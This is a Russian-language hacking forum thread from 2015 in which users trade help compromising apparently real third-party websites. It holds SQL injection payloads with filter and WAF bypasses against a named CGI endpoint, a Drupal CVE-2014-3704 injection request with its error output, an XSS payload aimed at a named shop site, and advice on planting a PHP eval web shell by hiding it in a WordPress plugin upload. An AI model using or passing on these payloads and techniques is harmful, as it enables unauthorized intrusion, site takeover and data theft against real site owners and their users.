ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.02.2015, 18:14
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от reuvenmatbil
reuvenmatbil said:
Код:
Code:
partenaires/partenaires.cgi?CAT=1+div+0+union+select+1,@@version,3,4,5,6--+&PAYS=AF
стоит фильтрация на ( и ). пробовал обойти с помощью urlencode — не вышло
что предпринять можно?
кроме ( и ) еще *, WAF на and. во всех полях ругался на кодировку, кроме 4. там и вывод номральный
Код:
Code:
partenaires/partenaires.cgi?CAT=1+|+1=0+union+select+1,2,3,table_name,5,6+from+information_schema.tables--+&PAYS=AF
|
|
|

06.02.2015, 18:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 46989
Репутация:
20
|
|
Есть сайт со sqli (старая версия drupal) CVE-2014-3704
Использовал следующие эксплоиты:
http://www.exploit-db.com/exploits/34993/
http://www.exploit-db.com/exploits/34992/
http://www.exploit-db.com/exploits/34984/
Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.
Как раскрутить я не знаю.
Sqli при пост запросе:
http://www.site.com/?q=node&destination=node
name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=us er_login_block&op=Log%2Bin
output:
Сообщение от None
Warning: mb_strlen() expects parameter 1 to be string, array given in drupal_strlen() (Zeile 478 von /pages/bd/asd/home/htdocs/site/includes/unicode.inc).
Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (Zeile 981 von /pages/bd/asd/home/htdocs/site/includes/database/database.inc).
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asd' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0', :name_0 AND status = 1; Array ( [:name_0'] => 0; [:name_0] => asd ) in user_login_authenticate_validate() (Zeile 2148 von /pages/bd/asd/home/htdocs/site/modules/user/user.module).
|
|
|
|

06.02.2015, 19:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 283
Репутация:
2
|
|
Сообщение от Vip77
Vip77 said:
Есть сайт со sqli (старая версия drupal) CVE-2014-3704
Использовал следующие эксплоиты:
http://www.exploit-db.com/exploits/34993/
http://www.exploit-db.com/exploits/34992/
http://www.exploit-db.com/exploits/34984/
Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.
Как раскрутить я не знаю.
Sqli при пост запросе:
http://www.site.com/?q=node&destination=node
name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=us er_login_block&op=Log%2Bin
output:
Ничего сложного, напиши мне по контактам в профиле, объясню.
|
|
|
|

06.02.2015, 23:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 46989
Репутация:
20
|
|
Сообщение от scr1m77
scr1m77 said:
Ничего сложного, напиши мне по контактам в профиле, объясню.
Благодарю за помощь.
|
|
|
|

07.02.2015, 00:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
При проверки на XSS сайт на экране "7" (не всплывающая)
Код:
Code:
chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.
|
|
|
|

07.02.2015, 00:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 15642
Репутация:
6
|
|
Сообщение от Unknowhacker
Unknowhacker said:
2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.
а ты сам то как думаешь?
|
|
|
|

07.02.2015, 14:36
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от Unknowhacker
Unknowhacker said:
При проверки на XSS сайт на экране "7" (не всплывающая)
Код:
Code:
chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.
возможно WAF.
обход авторизации? маловероятно, но попробуйте. стоит также рассмотреть и другие варианты уязвимостей
|
|
|

07.02.2015, 15:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Сообщение от UXOR
UXOR said:
а ты сам то как думаешь?
Я то думаю, что никак. Решил уточнить
.. faza02, каким образом обойти авторизацию?
|
|
|
|

07.02.2015, 20:01
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме: 883446
Репутация:
82
|
|
есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается
почему то выдает
Сообщение от None
Удаленный сервер или файл не найден
грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет.
что в таком случае можно сделать?
также рут в бд, но пути не раскрываются
|
|
|

07.02.2015, 20:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 178623
Репутация:
94
|
|
Сообщение от mazaxaka
mazaxaka said:
есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается
почему то выдает
грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет.
что в таком случае можно сделать?
также рут в бд, но пути не раскрываются
Ну, вообще-то если ты загружаешь плагин - то шелл будет не в папке uploads. Скачай готовый плагин, замени файл на шелл, загрузи и иди по примерно такому пути: site.com/wp-content/plugins/название_плагина/файл_с_шеллом.php.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|